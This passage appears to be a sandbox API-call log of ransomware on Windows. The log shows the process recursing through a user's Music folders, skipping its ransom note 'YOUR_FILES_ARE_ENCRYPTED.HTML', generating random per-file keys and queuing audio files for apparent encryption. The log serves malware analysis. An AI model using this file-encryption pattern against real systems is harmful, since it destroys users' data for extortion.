(in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa51505b0, ftCreationTime.dwHighDateTime=0x1d7df13, ftLastAccessTime.dwLowDateTime=0x83f695a0, ftLastAccessTime.dwHighDateTime=0x1d7e5d1, ftLastWriteTime.dwLowDateTime=0x83f695a0, ftLastWriteTime.dwHighDateTime=0x1d7e5d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd6c27, dwReserved1=0x0, cFileName="yg 2", cAlternateFileName="YG2~1")) returned 1 [0167.999] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2") returned 43 [0167.999] GetProcessHeap () returned 0x270000 [0167.999] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0167.999] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2" [0167.999] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\*" [0167.999] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa51505b0, ftCreationTime.dwHighDateTime=0x1d7df13, ftLastAccessTime.dwLowDateTime=0x83f695a0, ftLastAccessTime.dwHighDateTime=0x1d7e5d1, ftLastWriteTime.dwLowDateTime=0x83f695a0, ftLastWriteTime.dwHighDateTime=0x1d7e5d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x867451, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0167.999] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa51505b0, ftCreationTime.dwHighDateTime=0x1d7df13, ftLastAccessTime.dwLowDateTime=0x83f695a0, ftLastAccessTime.dwHighDateTime=0x1d7e5d1, ftLastWriteTime.dwLowDateTime=0x83f695a0, ftLastWriteTime.dwHighDateTime=0x1d7e5d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x867451, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.000] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2ee26e0, ftCreationTime.dwHighDateTime=0x1d7e1fa, ftLastAccessTime.dwLowDateTime=0x4b63e1a0, ftLastAccessTime.dwHighDateTime=0x1d7e678, ftLastWriteTime.dwLowDateTime=0x4b63e1a0, ftLastWriteTime.dwHighDateTime=0x1d7e678, nFileSizeHigh=0x0, nFileSizeLow=0xc95a, dwReserved0=0x867451, dwReserved1=0x0, cFileName="hXhYUZJtt_lYHHjNoSl.m4a", cAlternateFileName="HXHYUZ~1.M4A")) returned 1 [0168.000] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\hXhYUZJtt_lYHHjNoSl.m4a") returned 67 [0168.000] lstrcmpW (lpString1="hXhYUZJtt_lYHHjNoSl.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.000] PathFindExtensionW (pszPath="hXhYUZJtt_lYHHjNoSl.m4a") returned=".m4a" [0168.000] lstrlenW (lpString=".m4a") returned 4 [0168.001] PathFindExtensionW (pszPath="hXhYUZJtt_lYHHjNoSl.m4a") returned=".m4a" [0168.001] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\hXhYUZJtt_lYHHjNoSl.m4a" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\yg 2\\hxhyuzjtt_lyhhjnosl.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0168.001] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=51546) returned 1 [0168.001] GetProcessHeap () returned 0x270000 [0168.002] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0168.006] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="81") returned 2 [0168.006] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="61") returned 2 [0168.006] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="0B") returned 2 [0168.006] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="17") returned 2 [0168.006] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="E7") returned 2 [0168.006] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="A0") returned 2 [0168.006] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="61") returned 2 [0168.006] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="7F") returned 2 [0168.006] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="C4") returned 2 [0168.006] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="4F") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="2C") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="97") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="F4") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="21") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="C0") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="B5") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="77") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="39") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="6E") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="6E") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="3E") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="82") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="7D") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="40") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="87") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="05") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="4F") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="18") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="F9") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="A4") returned 2 [0168.008] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="E2") returned 2 [0168.008] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="16") returned 2 [0168.008] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\hXhYUZJtt_lYHHjNoSl.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\hXhYUZJtt_lYHHjNoSl.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\hXhYUZJtt_lYHHjNoSl.m4a" [0168.008] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.009] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0168.021] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92f91cf0, ftCreationTime.dwHighDateTime=0x1d7dd5f, ftLastAccessTime.dwLowDateTime=0x5f5ddde0, ftLastAccessTime.dwHighDateTime=0x1d7e476, ftLastWriteTime.dwLowDateTime=0x5f5ddde0, ftLastWriteTime.dwHighDateTime=0x1d7e476, nFileSizeHigh=0x0, nFileSizeLow=0x120cb, dwReserved0=0x867451, dwReserved1=0x0, cFileName="jkVcEzcZorxOQEzS.mp3", cAlternateFileName="JKVCEZ~1.MP3")) returned 1 [0168.021] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\jkVcEzcZorxOQEzS.mp3") returned 64 [0168.021] lstrcmpW (lpString1="jkVcEzcZorxOQEzS.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.021] PathFindExtensionW (pszPath="jkVcEzcZorxOQEzS.mp3") returned=".mp3" [0168.021] lstrlenW (lpString=".mp3") returned 4 [0168.021] PathFindExtensionW (pszPath="jkVcEzcZorxOQEzS.mp3") returned=".mp3" [0168.021] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\jkVcEzcZorxOQEzS.mp3" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\yg 2\\jkvcezczorxoqezs.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0168.022] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=73931) returned 1 [0168.022] GetProcessHeap () returned 0x270000 [0168.022] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0168.024] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="0D") returned 2 [0168.024] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="7D") returned 2 [0168.024] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="85") returned 2 [0168.024] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="05") returned 2 [0168.024] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="51") returned 2 [0168.024] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="BE") returned 2 [0168.024] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="57") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="00") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="20") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="19") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="E8") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="88") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="85") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="7E") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="DF") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="8A") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="E7") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="DE") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="ED") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="56") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="D1") returned 2 [0168.025] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="09") returned 2 [0168.026] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="37") returned 2 [0168.026] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="9D") returned 2 [0168.026] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="7B") returned 2 [0168.026] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="9B") returned 2 [0168.026] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="8D") returned 2 [0168.026] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="DE") returned 2 [0168.026] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="AD") returned 2 [0168.026] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="3E") returned 2 [0168.026] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="5E") returned 2 [0168.026] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="0A") returned 2 [0168.027] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\jkVcEzcZorxOQEzS.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\jkVcEzcZorxOQEzS.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\jkVcEzcZorxOQEzS.mp3" [0168.027] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.027] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0168.043] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f5e0a00, ftCreationTime.dwHighDateTime=0x1d7d990, ftLastAccessTime.dwLowDateTime=0x6bb69df0, ftLastAccessTime.dwHighDateTime=0x1d7dc30, ftLastWriteTime.dwLowDateTime=0x6bb69df0, ftLastWriteTime.dwHighDateTime=0x1d7dc30, nFileSizeHigh=0x0, nFileSizeLow=0x11526, dwReserved0=0x867451, dwReserved1=0x0, cFileName="MTyX.wav", cAlternateFileName="")) returned 1 [0168.043] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\MTyX.wav") returned 52 [0168.043] lstrcmpW (lpString1="MTyX.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.043] PathFindExtensionW (pszPath="MTyX.wav") returned=".wav" [0168.043] lstrlenW (lpString=".wav") returned 4 [0168.043] PathFindExtensionW (pszPath="MTyX.wav") returned=".wav" [0168.043] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.043] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\MTyX.wav" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\yg 2\\mtyx.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0168.044] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=70950) returned 1 [0168.044] GetProcessHeap () returned 0x270000 [0168.044] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0168.045] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="0D") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="A0") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="44") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="0B") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="E9") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="7A") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="17") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="DE") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="BF") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="7C") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="73") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="76") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="50") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="AF") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="23") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="6B") returned 2 [0168.045] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="AD") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="66") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="8E") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="77") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="A9") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="FB") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="82") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="39") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="59") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="BC") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="9A") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="FA") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="58") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="75") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="19") returned 2 [0168.046] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="2F") returned 2 [0168.047] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\MTyX.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\MTyX.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\MTyX.wav" [0168.047] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.047] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0168.052] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ca55840, ftCreationTime.dwHighDateTime=0x1d7db00, ftLastAccessTime.dwLowDateTime=0x1a72e530, ftLastAccessTime.dwHighDateTime=0x1d7e382, ftLastWriteTime.dwLowDateTime=0x1a72e530, ftLastWriteTime.dwHighDateTime=0x1d7e382, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x867451, dwReserved1=0x0, cFileName="RX0-yPNI7DvLWFXy1", cAlternateFileName="RX0-YP~1")) returned 1 [0168.056] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1") returned 61 [0168.056] GetProcessHeap () returned 0x270000 [0168.056] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0168.056] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1" [0168.056] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\*" [0168.056] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ca55840, ftCreationTime.dwHighDateTime=0x1d7db00, ftLastAccessTime.dwLowDateTime=0x1a72e530, ftLastAccessTime.dwHighDateTime=0x1d7e382, ftLastWriteTime.dwLowDateTime=0x1a72e530, ftLastWriteTime.dwHighDateTime=0x1d7e382, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfec51fdf, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0168.056] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ca55840, ftCreationTime.dwHighDateTime=0x1d7db00, ftLastAccessTime.dwLowDateTime=0x1a72e530, ftLastAccessTime.dwHighDateTime=0x1d7e382, ftLastWriteTime.dwLowDateTime=0x1a72e530, ftLastWriteTime.dwHighDateTime=0x1d7e382, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfec51fdf, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0168.056] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaba16e60, ftCreationTime.dwHighDateTime=0x1d7dd73, ftLastAccessTime.dwLowDateTime=0x8b108c70, ftLastAccessTime.dwHighDateTime=0x1d7e59e, ftLastWriteTime.dwLowDateTime=0x8b108c70, ftLastWriteTime.dwHighDateTime=0x1d7e59e, nFileSizeHigh=0x0, nFileSizeLow=0x187a4, dwReserved0=0xfec51fdf, dwReserved1=0xffffffff, cFileName="AXXYp8jRfDs2.wav", cAlternateFileName="AXXYP8~1.WAV")) returned 1 [0168.056] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\AXXYp8jRfDs2.wav") returned 78 [0168.056] lstrcmpW (lpString1="AXXYp8jRfDs2.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.056] PathFindExtensionW (pszPath="AXXYp8jRfDs2.wav") returned=".wav" [0168.056] lstrlenW (lpString=".wav") returned 4 [0168.056] PathFindExtensionW (pszPath="AXXYp8jRfDs2.wav") returned=".wav" [0168.057] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\AXXYp8jRfDs2.wav" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\yg 2\\rx0-ypni7dvlwfxy1\\axxyp8jrfds2.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0168.057] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=100260) returned 1 [0168.057] GetProcessHeap () returned 0x270000 [0168.057] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0168.058] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="D9") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="A4") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="B7") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="1D") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="0F") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="FB") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="42") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="F3") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="5C") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="EB") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="65") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="8D") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="07") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="5C") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="0C") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="89") returned 2 [0168.058] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="EC") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="22") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="68") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="20") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="86") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="B8") returned 2 [0168.059] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="0B") returned 2 [0168.059] wsprintfW (in: 